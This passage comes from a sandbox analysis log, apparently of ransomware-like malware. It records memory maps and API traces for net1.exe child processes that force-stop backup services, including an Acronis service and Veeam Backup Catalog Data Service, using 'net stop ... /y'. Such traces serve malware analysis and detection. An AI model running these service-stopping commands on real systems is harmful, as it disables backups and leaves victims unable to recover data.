"pagefile_0x00000000000b0000" filename = "" Region: id = 4636 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4637 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4638 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4639 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4640 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4641 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4642 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4643 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4644 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4645 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4646 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4647 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 465 os_tid = 0x106c Process: id = "85" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6e722000" os_pid = "0x1074" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0x101c" cmd_line = "C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4648 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4649 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4650 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4651 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4652 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4653 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4654 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4655 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4656 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4657 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4658 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4659 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4660 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4661 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4662 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4678 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4679 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4680 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4681 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4682 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 4683 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4684 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4685 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4686 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4687 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4688 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4689 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4690 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4691 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4692 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4693 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4694 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4695 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4696 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4697 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4698 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4699 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4700 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4724 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 467 os_tid = 0x1078 [0088.052] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fed0 | out: lpSystemTimeAsFileTime=0x22fed0*(dwLowDateTime=0xe9a75470, dwHighDateTime=0x1d48689)) [0088.052] GetCurrentProcessId () returned 0x1074 [0088.052] GetCurrentThreadId () returned 0x1078 [0088.053] GetTickCount () returned 0x1fdde [0088.053] QueryPerformanceCounter (in: lpPerformanceCount=0x22fed8 | out: lpPerformanceCount=0x22fed8*=1813497100000) returned 1 [0088.054] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0088.054] __set_app_type (_Type=0x1) [0088.054] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0088.055] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0088.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.055] GetConsoleOutputCP () returned 0x1b5 [0088.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0088.055] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0088.057] sprintf_s (in: _DstBuf=0x22fe78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.058] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0088.059] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0088.059] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" [0088.059] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22fc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0088.059] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.060] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22fe68 | out: Buffer=0x22fe68*=0x2f4d50) returned 0x0 [0088.060] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22fe68 | out: Buffer=0x22fe68*=0x2fc0f0) returned 0x0 [0088.060] _fileno (_File=0x7fefdba2a80) returned 0 [0088.060] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0088.060] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0088.060] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0088.060] _wcsicmp (_String1="config", _String2="stop") returned -16 [0088.060] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0088.060] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0088.060] _wcsicmp (_String1="file", _String2="stop") returned -13 [0088.060] _wcsicmp (_String1="files", _String2="stop") returned -13 [0088.060] _wcsicmp (_String1="group", _String2="stop") returned -12 [0088.060] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0088.060] _wcsicmp (_String1="help", _String2="stop") returned -11 [0088.060] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0088.060] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0088.060] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0088.060] _wcsicmp (_String1="session", _String2="stop") returned -15 [0088.061] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0088.061] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0088.061] _wcsicmp (_String1="share", _String2="stop") returned -12 [0088.061] _wcsicmp (_String1="start", _String2="stop") returned -14 [0088.061] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0088.061] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0088.061] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0088.061] _wcsicmp (_String1="accounts", _String2="AcrSch2Svc") returned -15 [0088.061] _wcsicmp (_String1="computer", _String2="AcrSch2Svc") returned 2 [0088.061] _wcsicmp (_String1="config", _String2="AcrSch2Svc") returned 2 [0088.061] _wcsicmp (_String1="continue", _String2="AcrSch2Svc") returned 2 [0088.061] _wcsicmp (_String1="cont", _String2="AcrSch2Svc") returned 2 [0088.061] _wcsicmp (_String1="file", _String2="AcrSch2Svc") returned 5 [0088.061] _wcsicmp (_String1="files", _String2="AcrSch2Svc") returned 5 [0088.061] _wcsicmp (_String1="group", _String2="AcrSch2Svc") returned 6 [0088.061] _wcsicmp (_String1="groups", _String2="AcrSch2Svc") returned 6 [0088.061] _wcsicmp (_String1="help", _String2="AcrSch2Svc") returned 7 [0088.061] _wcsicmp (_String1="helpmsg", _String2="AcrSch2Svc") returned 7 [0088.061] _wcsicmp (_String1="localgroup", _String2="AcrSch2Svc") returned 11 [0088.062] _wcsicmp (_String1="pause", _String2="AcrSch2Svc") returned 15 [0088.062] _wcsicmp (_String1="session", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="sessions", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="sess", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="share", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="start", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="stats", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="statistics", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="stop", _String2="AcrSch2Svc") returned 18 [0088.062] _wcsicmp (_String1="time", _String2="AcrSch2Svc") returned 19 [0088.062] _wcsicmp (_String1="user", _String2="AcrSch2Svc") returned 20 [0088.062] _wcsicmp (_String1="users", _String2="AcrSch2Svc") returned 20 [0088.062] _wcsicmp (_String1="msg", _String2="AcrSch2Svc") returned 12 [0088.062] _wcsicmp (_String1="messenger", _String2="AcrSch2Svc") returned 12 [0088.062] _wcsicmp (_String1="receiver", _String2="AcrSch2Svc") returned 17 [0088.062] _wcsicmp (_String1="rcv", _String2="AcrSch2Svc") returned 17 [0088.062] _wcsicmp (_String1="netpopup", _String2="AcrSch2Svc") returned 13 [0088.062] _wcsicmp (_String1="redirector", _String2="AcrSch2Svc") returned 17 [0088.062] _wcsicmp (_String1="redir", _String2="AcrSch2Svc") returned 17 [0088.062] _wcsicmp (_String1="rdr", _String2="AcrSch2Svc") returned 17 [0088.062] _wcsicmp (_String1="workstation", _String2="AcrSch2Svc") returned 22 [0088.062] _wcsicmp (_String1="work", _String2="AcrSch2Svc") returned 22 [0088.062] _wcsicmp (_String1="wksta", _String2="AcrSch2Svc") returned 22 [0088.062] _wcsicmp (_String1="prdr", _String2="AcrSch2Svc") returned 15 [0088.062] _wcsicmp (_String1="devrdr", _String2="AcrSch2Svc") returned 3 [0088.062] _wcsicmp (_String1="lanmanworkstation", _String2="AcrSch2Svc") returned 11 [0088.063] _wcsicmp (_String1="server", _String2="AcrSch2Svc") returned 18 [0088.063] _wcsicmp (_String1="svr", _String2="AcrSch2Svc") returned 18 [0088.063] _wcsicmp (_String1="srv", _String2="AcrSch2Svc") returned 18 [0088.063] _wcsicmp (_String1="lanmanserver", _String2="AcrSch2Svc") returned 11 [0088.063] _wcsicmp (_String1="alerter", _String2="AcrSch2Svc") returned 9 [0088.063] _wcsicmp (_String1="netlogon", _String2="AcrSch2Svc") returned 13 [0088.063] _wcsupr (in: _String="AcrSch2Svc" | out: _String="ACRSCH2SVC") returned="ACRSCH2SVC" [0088.063] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2fce00 [0088.235] GetServiceKeyNameW (in: hSCManager=0x2fce00, lpDisplayName="ACRSCH2SVC", lpServiceName=0xffff5750, lpcchBuffer=0x22fd88 | out: lpServiceName="", lpcchBuffer=0x22fd88) returned 0 [0088.236] _wcsicmp (_String1="msg", _String2="ACRSCH2SVC") returned 12 [0088.236] _wcsicmp (_String1="messenger", _String2="ACRSCH2SVC") returned 12 [0088.236] _wcsicmp (_String1="receiver", _String2="ACRSCH2SVC") returned 17 [0088.236] _wcsicmp (_String1="rcv", _String2="ACRSCH2SVC") returned 17 [0088.236] _wcsicmp (_String1="redirector", _String2="ACRSCH2SVC") returned 17 [0088.236] _wcsicmp (_String1="redir", _String2="ACRSCH2SVC") returned 17 [0088.236] _wcsicmp (_String1="rdr", _String2="ACRSCH2SVC") returned 17 [0088.236] _wcsicmp (_String1="workstation", _String2="ACRSCH2SVC") returned 22 [0088.236] _wcsicmp (_String1="work", _String2="ACRSCH2SVC") returned 22 [0088.236] _wcsicmp (_String1="wksta", _String2="ACRSCH2SVC") returned 22 [0088.236] _wcsicmp (_String1="prdr", _String2="ACRSCH2SVC") returned 15 [0088.236] _wcsicmp (_String1="devrdr", _String2="ACRSCH2SVC") returned 3 [0088.236] _wcsicmp (_String1="lanmanworkstation", _String2="ACRSCH2SVC") returned 11 [0088.236] _wcsicmp (_String1="server", _String2="ACRSCH2SVC") returned 18 [0088.236] _wcsicmp (_String1="svr", _String2="ACRSCH2SVC") returned 18 [0088.236] _wcsicmp (_String1="srv", _String2="ACRSCH2SVC") returned 18 [0088.236] _wcsicmp (_String1="lanmanserver", _String2="ACRSCH2SVC") returned 11 [0088.236] _wcsicmp (_String1="alerter", _String2="ACRSCH2SVC") returned 9 [0088.236] _wcsicmp (_String1="netlogon", _String2="ACRSCH2SVC") returned 13 [0088.236] NetServiceControl (in: servername=0x0, service="ACRSCH2SVC", opcode=0x0, arg=0x0, bufptr=0x22fd90 | out: bufptr=0x22fd90) returned 0x889 [0088.237] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.237] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0088.238] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0088.240] GetFileType (hFile=0xb) returned 0x2 [0088.240] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fc58 | out: lpMode=0x22fc58) returned 1 [0088.240] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x22fc50, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x22fc50*=0x1e) returned 1 [0088.240] GetFileType (hFile=0xb) returned 0x2 [0088.241] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fc58 | out: lpMode=0x22fc58) returned 1 [0088.241] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22fc50, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x22fc50*=0x2) returned 1 [0088.241] _ultow (in: _Dest=0x889, _Radix=2292928 | out: _Dest=0x889) returned="2185" [0088.241] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0088.241] GetFileType (hFile=0xb) returned 0x2 [0088.242] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fc58 | out: lpMode=0x22fc58) returned 1 [0088.242] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x22fc50, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x22fc50*=0x34) returned 1 [0088.242] GetFileType (hFile=0xb) returned 0x2 [0088.242] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fc58 | out: lpMode=0x22fc58) returned 1 [0088.243] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22fc50, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x22fc50*=0x2) returned 1 [0088.243] NetApiBufferFree (Buffer=0x2f4d50) returned 0x0 [0088.243] NetApiBufferFree (Buffer=0x2fc0f0) returned 0x0 [0088.243] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" [0088.243] exit (_Code=2) Process: id = "86" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x203f8000" os_pid = "0x107c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "80" os_parent_pid = "0x8a8" cmd_line = "C:\\Windows\\system32\\net1 stop \"Veeam Backup Catalog Data Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4663 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4664 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4665 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4666 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4667 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4668 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4669 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4670 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4671 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4672 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4673 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4674 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4675 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 4676 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4677 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4701 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4702 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4703 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4704 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4705 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4706 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4707 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4708 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4709 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4710 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4711 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4712 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4713 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4714 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = 